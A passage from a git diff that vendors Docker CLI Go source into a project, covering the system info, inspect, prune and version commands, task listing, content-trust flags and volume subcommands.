fmt.Fprintf(dockerCli.Out(), " Profile: %s\n", o.Value) + } + } + } + } + } + + // Isolation only has meaning on a Windows daemon. + if info.OSType == "windows" { + fmt.Fprintf(dockerCli.Out(), "Default Isolation: %v\n", info.Isolation) + } + + ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Kernel Version: %s\n", info.KernelVersion) + ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Operating System: %s\n", info.OperatingSystem) + ioutils.FprintfIfNotEmpty(dockerCli.Out(), "OSType: %s\n", info.OSType) + ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Architecture: %s\n", info.Architecture) + fmt.Fprintf(dockerCli.Out(), "CPUs: %d\n", info.NCPU) + fmt.Fprintf(dockerCli.Out(), "Total Memory: %s\n", units.BytesSize(float64(info.MemTotal))) + ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Name: %s\n", info.Name) + ioutils.FprintfIfNotEmpty(dockerCli.Out(), "ID: %s\n", info.ID) + fmt.Fprintf(dockerCli.Out(), "Docker Root Dir: %s\n", info.DockerRootDir) + fmt.Fprintf(dockerCli.Out(), "Debug Mode (client): %v\n", utils.IsDebugEnabled()) + fmt.Fprintf(dockerCli.Out(), "Debug Mode (server): %v\n", info.Debug) + + if info.Debug { + fmt.Fprintf(dockerCli.Out(), " File Descriptors: %d\n", info.NFd) + fmt.Fprintf(dockerCli.Out(), " Goroutines: %d\n", info.NGoroutines) + fmt.Fprintf(dockerCli.Out(), " System Time: %s\n", info.SystemTime) + fmt.Fprintf(dockerCli.Out(), " EventsListeners: %d\n", info.NEventsListener) + } + + ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Http Proxy: %s\n", info.HTTPProxy) + ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Https Proxy: %s\n", info.HTTPSProxy) + ioutils.FprintfIfNotEmpty(dockerCli.Out(), "No Proxy: %s\n", info.NoProxy) + + if info.IndexServerAddress != "" { + u := dockerCli.ConfigFile().AuthConfigs[info.IndexServerAddress].Username + if len(u) > 0 { + fmt.Fprintf(dockerCli.Out(), "Username: %v\n", u) + } + fmt.Fprintf(dockerCli.Out(), "Registry: %v\n", info.IndexServerAddress) + } + + // Only output these warnings if the server does not support these features + if info.OSType != "windows" { + if !info.MemoryLimit { + fmt.Fprintln(dockerCli.Err(), "WARNING: No memory limit support") + } + if !info.SwapLimit { + fmt.Fprintln(dockerCli.Err(), "WARNING: No swap limit support") + } + if !info.KernelMemory { + fmt.Fprintln(dockerCli.Err(), "WARNING: No kernel memory limit support") + } + if !info.OomKillDisable { + fmt.Fprintln(dockerCli.Err(), "WARNING: No oom kill disable support") + } + if !info.CPUCfsQuota { + fmt.Fprintln(dockerCli.Err(), "WARNING: No cpu cfs quota support") + } + if !info.CPUCfsPeriod { + fmt.Fprintln(dockerCli.Err(), "WARNING: No cpu cfs period support") + } + if !info.CPUShares { + fmt.Fprintln(dockerCli.Err(), "WARNING: No cpu shares support") + } + if !info.CPUSet { + fmt.Fprintln(dockerCli.Err(), "WARNING: No cpuset support") + } + if !info.IPv4Forwarding { + fmt.Fprintln(dockerCli.Err(), "WARNING: IPv4 forwarding is disabled") + } + if !info.BridgeNfIptables { + fmt.Fprintln(dockerCli.Err(), "WARNING: bridge-nf-call-iptables is disabled") + } + if !info.BridgeNfIP6tables { + fmt.Fprintln(dockerCli.Err(), "WARNING: bridge-nf-call-ip6tables is disabled") + } + } + + if info.Labels != nil { + fmt.Fprintln(dockerCli.Out(), "Labels:") + for _, attribute := range info.Labels { + fmt.Fprintf(dockerCli.Out(), " %s\n", attribute) + } + // TODO: Engine labels with duplicate keys has been deprecated in 1.13 and will be error out + // after 3 release cycles (1.16). For now, a WARNING will be generated. The following will + // be removed eventually. + labelMap := map[string]string{} + for _, label := range info.Labels { + stringSlice := strings.SplitN(label, "=", 2) + if len(stringSlice) > 1 { + // If there is a conflict we will throw out an warning + if v, ok := labelMap[stringSlice[0]]; ok && v != stringSlice[1] { + fmt.Fprintln(dockerCli.Err(), "WARNING: labels with duplicate keys and conflicting values have been deprecated") + break + } + labelMap[stringSlice[0]] = stringSlice[1] + } + } + } + + fmt.Fprintf(dockerCli.Out(), "Experimental: %v\n", info.ExperimentalBuild) + if info.ClusterStore != "" { + fmt.Fprintf(dockerCli.Out(), "Cluster Store: %s\n", info.ClusterStore) + } + + if info.ClusterAdvertise != "" { + fmt.Fprintf(dockerCli.Out(), "Cluster Advertise: %s\n", info.ClusterAdvertise) + } + + if info.RegistryConfig != nil && (len(info.RegistryConfig.InsecureRegistryCIDRs) > 0 || len(info.RegistryConfig.IndexConfigs) > 0) { + fmt.Fprintln(dockerCli.Out(), "Insecure Registries:") + for _, registry := range info.RegistryConfig.IndexConfigs { + if registry.Secure == false { + fmt.Fprintf(dockerCli.Out(), " %s\n", registry.Name) + } + } + + for _, registry := range info.RegistryConfig.InsecureRegistryCIDRs { + mask, _ := registry.Mask.Size() + fmt.Fprintf(dockerCli.Out(), " %s/%d\n", registry.IP.String(), mask) + } + } + + if info.RegistryConfig != nil && len(info.RegistryConfig.Mirrors) > 0 { + fmt.Fprintln(dockerCli.Out(), "Registry Mirrors:") + for _, mirror := range info.RegistryConfig.Mirrors { + fmt.Fprintf(dockerCli.Out(), " %s\n", mirror) + } + } + + fmt.Fprintf(dockerCli.Out(), "Live Restore Enabled: %v\n", info.LiveRestoreEnabled) + + return nil +} + +func formatInfo(dockerCli *command.DockerCli, info types.Info, format string) error { + tmpl, err := templates.Parse(format) + if err != nil { + return cli.StatusError{StatusCode: 64, + Status: "Template parsing error: " + err.Error()} + } + err = tmpl.Execute(dockerCli.Out(), info) + dockerCli.Out().Write([]byte{'\n'}) + return err +} diff --git a/vendor/github.com/docker/docker/cli/command/system/inspect.go b/vendor/github.com/docker/docker/cli/command/system/inspect.go new file mode 100644 index 0000000000..c86e858a29 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/system/inspect.go @@ -0,0 +1,203 @@ +package system + +import ( + "fmt" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/inspect" + apiclient "github.com/docker/docker/client" + "github.com/spf13/cobra" +) + +type inspectOptions struct { + format string + inspectType string + size bool + ids []string +} + +// NewInspectCommand creates a new cobra.Command for `docker inspect` +func NewInspectCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts inspectOptions + + cmd := &cobra.Command{ + Use: "inspect [OPTIONS] NAME|ID [NAME|ID...]", + Short: "Return low-level information on Docker objects", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.ids = args + return runInspect(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") + flags.StringVar(&opts.inspectType, "type", "", "Return JSON for specified type") + flags.BoolVarP(&opts.size, "size", "s", false, "Display total file sizes if the type is container") + + return cmd +} + +func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { + var elementSearcher inspect.GetRefFunc + switch opts.inspectType { + case "", "container", "image", "node", "network", "service", "volume", "task", "plugin": + elementSearcher = inspectAll(context.Background(), dockerCli, opts.size, opts.inspectType) + default: + return fmt.Errorf("%q is not a valid value for --type", opts.inspectType) + } + return inspect.Inspect(dockerCli.Out(), opts.ids, opts.format, elementSearcher) +} + +func inspectContainers(ctx context.Context, dockerCli *command.DockerCli, getSize bool) inspect.GetRefFunc { + return func(ref string) (interface{}, []byte, error) { + return dockerCli.Client().ContainerInspectWithRaw(ctx, ref, getSize) + } +} + +func inspectImages(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { + return func(ref string) (interface{}, []byte, error) { + return dockerCli.Client().ImageInspectWithRaw(ctx, ref) + } +} + +func inspectNetwork(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { + return func(ref string) (interface{}, []byte, error) { + return dockerCli.Client().NetworkInspectWithRaw(ctx, ref) + } +} + +func inspectNode(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { + return func(ref string) (interface{}, []byte, error) { + return dockerCli.Client().NodeInspectWithRaw(ctx, ref) + } +} + +func inspectService(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { + return func(ref string) (interface{}, []byte, error) { + return dockerCli.Client().ServiceInspectWithRaw(ctx, ref) + } +} + +func inspectTasks(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { + return func(ref string) (interface{}, []byte, error) { + return dockerCli.Client().TaskInspectWithRaw(ctx, ref) + } +} + +func inspectVolume(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { + return func(ref string) (interface{}, []byte, error) { + return dockerCli.Client().VolumeInspectWithRaw(ctx, ref) + } +} + +func inspectPlugin(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { + return func(ref string) (interface{}, []byte, error) { + return dockerCli.Client().PluginInspectWithRaw(ctx, ref) + } +} + +func inspectAll(ctx context.Context, dockerCli *command.DockerCli, getSize bool, typeConstraint string) inspect.GetRefFunc { + var inspectAutodetect = []struct { + objectType string + isSizeSupported bool + isSwarmObject bool + objectInspector func(string) (interface{}, []byte, error) + }{ + { + objectType: "container", + isSizeSupported: true, + objectInspector: inspectContainers(ctx, dockerCli, getSize), + }, + { + objectType: "image", + objectInspector: inspectImages(ctx, dockerCli), + }, + { + objectType: "network", + objectInspector: inspectNetwork(ctx, dockerCli), + }, + { + objectType: "volume", + objectInspector: inspectVolume(ctx, dockerCli), + }, + { + objectType: "service", + isSwarmObject: true, + objectInspector: inspectService(ctx, dockerCli), + }, + { + objectType: "task", + isSwarmObject: true, + objectInspector: inspectTasks(ctx, dockerCli), + }, + { + objectType: "node", + isSwarmObject: true, + objectInspector: inspectNode(ctx, dockerCli), + }, + { + objectType: "plugin", + objectInspector: inspectPlugin(ctx, dockerCli), + }, + } + + // isSwarmManager does an Info API call to verify that the daemon is + // a swarm manager. + isSwarmManager := func() bool { + info, err := dockerCli.Client().Info(ctx) + if err != nil { + fmt.Fprintln(dockerCli.Err(), err) + return false + } + return info.Swarm.ControlAvailable + } + + isErrNotSupported := func(err error) bool { + return strings.Contains(err.Error(), "not supported") + } + + return func(ref string) (interface{}, []byte, error) { + const ( + swarmSupportUnknown = iota + swarmSupported + swarmUnsupported + ) + + isSwarmSupported := swarmSupportUnknown + + for _, inspectData := range inspectAutodetect { + if typeConstraint != "" && inspectData.objectType != typeConstraint { + continue + } + if typeConstraint == "" && inspectData.isSwarmObject { + if isSwarmSupported == swarmSupportUnknown { + if isSwarmManager() { + isSwarmSupported = swarmSupported + } else { + isSwarmSupported = swarmUnsupported + } + } + if isSwarmSupported == swarmUnsupported { + continue + } + } + v, raw, err := inspectData.objectInspector(ref) + if err != nil { + if typeConstraint == "" && (apiclient.IsErrNotFound(err) || isErrNotSupported(err)) { + continue + } + return v, raw, err + } + if getSize && !inspectData.isSizeSupported { + fmt.Fprintf(dockerCli.Err(), "WARNING: --size ignored for %s\n", inspectData.objectType) + } + return v, raw, err + } + return nil, nil, fmt.Errorf("Error: No such object: %s", ref) + } +} diff --git a/vendor/github.com/docker/docker/cli/command/system/prune.go b/vendor/github.com/docker/docker/cli/command/system/prune.go new file mode 100644 index 0000000000..92dddbdca6 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/system/prune.go @@ -0,0 +1,93 @@ +package system + +import ( + "fmt" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/prune" + units "github.com/docker/go-units" + "github.com/spf13/cobra" +) + +type pruneOptions struct { + force bool + all bool +} + +// NewPruneCommand creates a new cobra.Command for `docker prune` +func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts pruneOptions + + cmd := &cobra.Command{ + Use: "prune [OPTIONS]", + Short: "Remove unused data", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runPrune(dockerCli, opts) + }, + Tags: map[string]string{"version": "1.25"}, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation") + flags.BoolVarP(&opts.all, "all", "a", false, "Remove all unused images not just dangling ones") + + return cmd +} + +const ( + warning = `WARNING! This will remove: + - all stopped containers + - all volumes not used by at least one container + - all networks not used by at least one container + %s +Are you sure you want to continue?` + + danglingImageDesc = "- all dangling images" + allImageDesc = `- all images without at least one container associated to them` +) + +func runPrune(dockerCli *command.DockerCli, opts pruneOptions) error { + var message string + + if opts.all { + message = fmt.Sprintf(warning, allImageDesc) + } else { + message = fmt.Sprintf(warning, danglingImageDesc) + } + + if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), message) { + return nil + } + + var spaceReclaimed uint64 + + for _, pruneFn := range []func(dockerCli *command.DockerCli) (uint64, string, error){ + prune.RunContainerPrune, + prune.RunVolumePrune, + prune.RunNetworkPrune, + } { + spc, output, err := pruneFn(dockerCli) + if err != nil { + return err + } + spaceReclaimed += spc + if output != "" { + fmt.Fprintln(dockerCli.Out(), output) + } + } + + spc, output, err := prune.RunImagePrune(dockerCli, opts.all) + if err != nil { + return err + } + if spc > 0 { + spaceReclaimed += spc + fmt.Fprintln(dockerCli.Out(), output) + } + + fmt.Fprintln(dockerCli.Out(), "Total reclaimed space:", units.HumanSize(float64(spaceReclaimed))) + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/system/version.go b/vendor/github.com/docker/docker/cli/command/system/version.go new file mode 100644 index 0000000000..ded4f4d118 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/system/version.go @@ -0,0 +1,113 @@ +package system + +import ( + "fmt" + "runtime" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/utils/templates" + "github.com/spf13/cobra" +) + +var versionTemplate = `Client: + Version: {{.Client.Version}} + API version: {{.Client.APIVersion}} + Go version: {{.Client.GoVersion}} + Git commit: {{.Client.GitCommit}} + Built: {{.Client.BuildTime}} + OS/Arch: {{.Client.Os}}/{{.Client.Arch}}{{if .ServerOK}} + +Server: + Version: {{.Server.Version}} + API version: {{.Server.APIVersion}} (minimum version {{.Server.MinAPIVersion}}) + Go version: {{.Server.GoVersion}} + Git commit: {{.Server.GitCommit}} + Built: {{.Server.BuildTime}} + OS/Arch: {{.Server.Os}}/{{.Server.Arch}} + Experimental: {{.Server.Experimental}}{{end}}` + +type versionOptions struct { + format string +} + +// NewVersionCommand creates a new cobra.Command for `docker version` +func NewVersionCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts versionOptions + + cmd := &cobra.Command{ + Use: "version [OPTIONS]", + Short: "Show the Docker version information", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runVersion(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + + flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") + + return cmd +} + +func runVersion(dockerCli *command.DockerCli, opts *versionOptions) error { + ctx := context.Background() + + templateFormat := versionTemplate + if opts.format != "" { + templateFormat = opts.format + } + + tmpl, err := templates.Parse(templateFormat) + if err != nil { + return cli.StatusError{StatusCode: 64, + Status: "Template parsing error: " + err.Error()} + } + + APIVersion := dockerCli.Client().ClientVersion() + if defaultAPIVersion := dockerCli.DefaultVersion(); APIVersion != defaultAPIVersion { + APIVersion = fmt.Sprintf("%s (downgraded from %s)", APIVersion, defaultAPIVersion) + } + + vd := types.VersionResponse{ + Client: &types.Version{ + Version: dockerversion.Version, + APIVersion: APIVersion, + GoVersion: runtime.Version(), + GitCommit: dockerversion.GitCommit, + BuildTime: dockerversion.BuildTime, + Os: runtime.GOOS, + Arch: runtime.GOARCH, + }, + } + + serverVersion, err := dockerCli.Client().ServerVersion(ctx) + if err == nil { + vd.Server = &serverVersion + } + + // first we need to make BuildTime more human friendly + t, errTime := time.Parse(time.RFC3339Nano, vd.Client.BuildTime) + if errTime == nil { + vd.Client.BuildTime = t.Format(time.ANSIC) + } + + if vd.ServerOK() { + t, errTime = time.Parse(time.RFC3339Nano, vd.Server.BuildTime) + if errTime == nil { + vd.Server.BuildTime = t.Format(time.ANSIC) + } + } + + if err2 := tmpl.Execute(dockerCli.Out(), vd); err2 != nil && err == nil { + err = err2 + } + dockerCli.Out().Write([]byte{'\n'}) + return err +} diff --git a/vendor/github.com/docker/docker/cli/command/task/print.go b/vendor/github.com/docker/docker/cli/command/task/print.go new file mode 100644 index 0000000000..0f1c2cf724 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/task/print.go @@ -0,0 +1,161 @@ +package task + +import ( + "fmt" + "io" + "sort" + "strings" + "text/tabwriter" + "time" + + "golang.org/x/net/context" + + distreference "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/idresolver" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/go-units" +) + +const ( + psTaskItemFmt = "%s\t%s\t%s\t%s\t%s\t%s %s ago\t%s\t%s\n" + maxErrLength = 30 +) + +type portStatus swarm.PortStatus + +func (ps portStatus) String() string { + if len(ps.Ports) == 0 { + return "" + } + + str := fmt.Sprintf("*:%d->%d/%s", ps.Ports[0].PublishedPort, ps.Ports[0].TargetPort, ps.Ports[0].Protocol) + for _, pConfig := range ps.Ports[1:] { + str += fmt.Sprintf(",*:%d->%d/%s", pConfig.PublishedPort, pConfig.TargetPort, pConfig.Protocol) + } + + return str +} + +type tasksBySlot []swarm.Task + +func (t tasksBySlot) Len() int { + return len(t) +} + +func (t tasksBySlot) Swap(i, j int) { + t[i], t[j] = t[j], t[i] +} + +func (t tasksBySlot) Less(i, j int) bool { + // Sort by slot. + if t[i].Slot != t[j].Slot { + return t[i].Slot < t[j].Slot + } + + // If same slot, sort by most recent. + return t[j].Meta.CreatedAt.Before(t[i].CreatedAt) +} + +// Print task information in a table format. +// Besides this, command `docker node ps ` +// and `docker stack ps` will call this, too. +func Print(dockerCli *command.DockerCli, ctx context.Context, tasks []swarm.Task, resolver *idresolver.IDResolver, noTrunc bool) error { + sort.Stable(tasksBySlot(tasks)) + + writer := tabwriter.NewWriter(dockerCli.Out(), 0, 4, 2, ' ', 0) + + // Ignore flushing errors + defer writer.Flush() + fmt.Fprintln(writer, strings.Join([]string{"ID", "NAME", "IMAGE", "NODE", "DESIRED STATE", "CURRENT STATE", "ERROR", "PORTS"}, "\t")) + + if err := print(writer, ctx, tasks, resolver, noTrunc); err != nil { + return err + } + + return nil +} + +// PrintQuiet shows task list in a quiet way. +func PrintQuiet(dockerCli *command.DockerCli, tasks []swarm.Task) error { + sort.Stable(tasksBySlot(tasks)) + + out := dockerCli.Out() + + for _, task := range tasks { + fmt.Fprintln(out, task.ID) + } + + return nil +} + +func print(out io.Writer, ctx context.Context, tasks []swarm.Task, resolver *idresolver.IDResolver, noTrunc bool) error { + prevName := "" + for _, task := range tasks { + id := task.ID + if !noTrunc { + id = stringid.TruncateID(id) + } + + serviceName, err := resolver.Resolve(ctx, swarm.Service{}, task.ServiceID) + if err != nil { + return err + } + + nodeValue, err := resolver.Resolve(ctx, swarm.Node{}, task.NodeID) + if err != nil { + return err + } + + name := "" + if task.Slot != 0 { + name = fmt.Sprintf("%v.%v", serviceName, task.Slot) + } else { + name = fmt.Sprintf("%v.%v", serviceName, task.NodeID) + } + + // Indent the name if necessary + indentedName := name + if name == prevName { + indentedName = fmt.Sprintf(" \\_ %s", indentedName) + } + prevName = name + + // Trim and quote the error message. + taskErr := task.Status.Err + if !noTrunc && len(taskErr) > maxErrLength { + taskErr = fmt.Sprintf("%s…", taskErr[:maxErrLength-1]) + } + if len(taskErr) > 0 { + taskErr = fmt.Sprintf("\"%s\"", taskErr) + } + + image := task.Spec.ContainerSpec.Image + if !noTrunc { + ref, err := distreference.ParseNamed(image) + if err == nil { + // update image string for display + namedTagged, ok := ref.(distreference.NamedTagged) + if ok { + image = namedTagged.Name() + ":" + namedTagged.Tag() + } + } + } + + fmt.Fprintf( + out, + psTaskItemFmt, + id, + indentedName, + image, + nodeValue, + command.PrettyPrint(task.DesiredState), + command.PrettyPrint(task.Status.State), + strings.ToLower(units.HumanDuration(time.Since(task.Status.Timestamp))), + taskErr, + portStatus(task.Status.PortStatus), + ) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/trust.go b/vendor/github.com/docker/docker/cli/command/trust.go new file mode 100644 index 0000000000..b4c8a84ee5 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/trust.go @@ -0,0 +1,39 @@ +package command + +import ( + "os" + "strconv" + + "github.com/spf13/pflag" +) + +var ( + // TODO: make this not global + untrusted bool +) + +// AddTrustedFlags adds content trust flags to the current command flagset +func AddTrustedFlags(fs *pflag.FlagSet, verify bool) { + trusted, message := setupTrustedFlag(verify) + fs.BoolVar(&untrusted, "disable-content-trust", !trusted, message) +} + +func setupTrustedFlag(verify bool) (bool, string) { + var trusted bool + if e := os.Getenv("DOCKER_CONTENT_TRUST"); e != "" { + if t, err := strconv.ParseBool(e); t || err != nil { + // treat any other value as true + trusted = true + } + } + message := "Skip image signing" + if verify { + message = "Skip image verification" + } + return trusted, message +} + +// IsTrusted returns true if content trust is enabled +func IsTrusted() bool { + return !untrusted +} diff --git a/vendor/github.com/docker/docker/cli/command/utils.go b/vendor/github.com/docker/docker/cli/command/utils.go new file mode 100644 index 0000000000..1837ca41f0 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/utils.go @@ -0,0 +1,87 @@ +package command + +import ( + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "runtime" + "strings" +) + +// CopyToFile writes the content of the reader to the specified file +func CopyToFile(outfile string, r io.Reader) error { + tmpFile, err := ioutil.TempFile(filepath.Dir(outfile), ".docker_temp_") + if err != nil { + return err + } + + tmpPath := tmpFile.Name() + + _, err = io.Copy(tmpFile, r) + tmpFile.Close() + + if err != nil { + os.Remove(tmpPath) + return err + } + + if err = os.Rename(tmpPath, outfile); err != nil { + os.Remove(tmpPath) + return err + } + + return nil +} + +// capitalizeFirst capitalizes the first character of string +func capitalizeFirst(s string) string { + switch l := len(s); l { + case 0: + return s + case 1: + return strings.ToLower(s) + default: + return strings.ToUpper(string(s[0])) + strings.ToLower(s[1:]) + } +} + +// PrettyPrint outputs arbitrary data for human formatted output by uppercasing the first letter. +func PrettyPrint(i interface{}) string { + switch t := i.(type) { + case nil: + return "None" + case string: + return capitalizeFirst(t) + default: + return capitalizeFirst(fmt.Sprintf("%s", t)) + } +} + +// PromptForConfirmation requests and checks confirmation from user. +// This will display the provided message followed by ' [y/N] '. If +// the user input 'y' or 'Y' it returns true other false. If no +// message is provided "Are you sure you want to proceed? [y/N] " +// will be used instead. +func PromptForConfirmation(ins *InStream, outs *OutStream, message string) bool { + if message == "" { + message = "Are you sure you want to proceed?" + } + message += " [y/N] " + + fmt.Fprintf(outs, message) + + // On Windows, force the use of the regular OS stdin stream. + if runtime.GOOS == "windows" { + ins = NewInStream(os.Stdin) + } + + answer := "" + n, _ := fmt.Fscan(ins, &answer) + if n != 1 || (answer != "y" && answer != "Y") { + return false + } + + return true +} diff --git a/vendor/github.com/docker/docker/cli/command/volume/cmd.go b/vendor/github.com/docker/docker/cli/command/volume/cmd.go new file mode 100644 index 0000000000..40862f29d1 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/volume/cmd.go @@ -0,0 +1,45 @@ +package volume + +import ( + "github.com/spf13/cobra" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" +) + +// NewVolumeCommand returns a cobra command for `volume` subcommands +func NewVolumeCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "volume COMMAND", + Short: "Manage volumes", + Long: volumeDescription, + Args: cli.NoArgs, + RunE: dockerCli.ShowHelp, + } + cmd.AddCommand( + newCreateCommand(dockerCli), + newInspectCommand(dockerCli), + newListCommand(dockerCli), + newRemoveCommand(dockerCli), + NewPruneCommand(dockerCli), + ) + return cmd +} + +var volumeDescription = ` +The **docker volume** command has subcommands for managing data volumes. A data +volume is a specially-designated directory that by-passes storage driver +management. + +Data volumes persist data independent of a container's life cycle. When you +delete a container, the Docker daemon does not delete any data volumes. You can +share volumes across multiple containers. Moreover, you can share data volumes +with other computing resources in your system. + +To see help for a subcommand, use: + + docker volume COMMAND --help + +For full details on using docker volume visit Docker's online documentation. + +` diff --git a/vendor/github.com/docker/docker/cli/command/volume/create.go b/vendor/github.com/docker/docker/cli/command/volume/create.go new file mode 100644 index 0000000000..7b2a7e3318 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/volume/create.go @@ -0,0 +1,111 @@ +package volume + +import ( + "fmt" + + "golang.org/x/net/context" + + volumetypes "github.com/docker/docker/api/types/volume" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/opts" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/spf13/cobra" +) + +type createOptions struct { + name string + driver string + driverOpts opts.MapOpts + labels opts.ListOpts +} + +func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := createOptions{ + driverOpts: *opts.NewMapOpts(nil, nil), + labels: opts.NewListOpts(runconfigopts.ValidateEnv), + } + + cmd := &cobra.Command{ + Use: "create [OPTIONS] [VOLUME]", + Short: "Create a volume", + Long: createDescription, + Args: cli.RequiresMaxArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + if len(args) == 1 { + if opts.name != "" { + fmt.Fprint(dockerCli.Err(), "Conflicting options: either specify --name or provide positional arg, not both\n") + return cli.StatusError{StatusCode: 1} + } + opts.name = args[0] + } + return runCreate(dockerCli, opts) + }, + } + flags := cmd.Flags() + flags.StringVarP(&opts.driver, "driver", "d", "local", "Specify volume driver name") + flags.StringVar(&opts.name, "name", "", "Specify volume name") + flags.Lookup("name").Hidden = true + flags.VarP(&opts.driverOpts, "opt", "o", "Set driver specific options") + flags.Var(&opts.labels, "label", "Set metadata for a volume") + + return cmd +} + +func runCreate(dockerCli *command.DockerCli, opts createOptions) error { + client := dockerCli.Client() + + volReq := volumetypes.VolumesCreateBody{ + Driver: opts.driver, + DriverOpts: opts.driverOpts.GetAll(), + Name: opts.name, + Labels: runconfigopts.ConvertKVStringsToMap(opts.labels.GetAll()), + } + + vol, err := client.VolumeCreate(context.Background(), volReq) + if err != nil { + return err + } + + fmt.Fprintf(dockerCli.Out(), "%s\n", vol.Name) + return nil +} + +var createDescription = ` +Creates a new volume that containers can consume and store data in. If a name +is not specified, Docker generates a random name. You create a volume and then +configure the container to use it, for example: + + $ docker volume create hello + hello + $ docker run -d -v hello:/world busybox ls /world + +The mount is created inside the container's **/src** directory. Docker doesn't +not support relative paths for mount points inside the container. + +Multiple containers can use the same volume in the same time period. This is +useful if two containers need access to shared data. For example, if one +container writes and the other reads the data. + +## Driver specific options + +Some volume drivers may take options to customize the volume creation. Use the +**-o** or **--opt** flags to pass driver options: + + $ docker volume create --driver fake --opt tardis=blue --opt timey=wimey + +These options are passed directly to the volume driver. Options for different +volume drivers may do different things (or nothing at all). + +The built-in **local** driver on Windows does not support any options. + +The built-in **local** driver on Linux accepts options similar to the linux +**mount** command: + + $ docker volume create --driver local --opt type=tmpfs --opt device=tmpfs --opt o=size=100m,uid=1000 + +Another example: + + $ docker volume create --driver local --opt type=btrfs --opt device=/dev/sda2 + +` diff --git a/vendor/github.com/docker/docker/cli/command/volume/inspect.go b/vendor/github.com/docker/docker/cli/command/volume/inspect.go new file mode 100644 index 0000000000..5eb8ad2516 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/volume/inspect.go @@ -0,0 +1,55 @@ +package volume + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/inspect" + "github.com/spf13/cobra" +) + +type inspectOptions struct { + format string + names []string +} + +func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts inspectOptions + + cmd := &cobra.Command{ + Use: "inspect [OPTIONS] VOLUME [VOLUME...]", + Short: "Display detailed information on one or more volumes", + Long: inspectDescription, + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.names = args + return runInspect(dockerCli, opts) + }, + } + + cmd.Flags().StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") + + return cmd +} + +func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { + client := dockerCli.Client() + + ctx := context.Background() + + getVolFunc := func(name string) (interface{}, []byte, error) { + i, err := client.VolumeInspect(ctx, name) + return i, nil, err + } + + return inspect.Inspect(dockerCli.Out(), opts.names, opts.format, getVolFunc) +} + +var inspectDescription = ` +Returns information about one or more volumes. By default, this command renders +all results in a JSON array. You can specify an alternate format to execute a +given template is executed for each result. Go's https://golang.org/pkg/text/template/ +package describes all the details of the format. + +` diff --git a/vendor/github.com/docker/docker/cli/command/volume/list.go b/vendor/github.com/docker/docker/cli/command/volume/list.go new file mode 100644 index 0000000000..d76006a1b2 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/volume/list.go @@ -0,0 +1,91 @@ +package volume + +import ( + "sort" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/formatter" + "github.com/docker/docker/opts" + "github.com/spf13/cobra" +) + +type byVolumeName []*types.Volume + +func (r byVolumeName) Len() int { return len(r) } +func (r byVolumeName) Swap(i, j int) { r[i], r[j] = r[j], r[i] } +func (r byVolumeName) Less(i, j int) bool { + return r[i].Name < r[j].Name +} + +type listOptions struct { + quiet bool + format string + filter 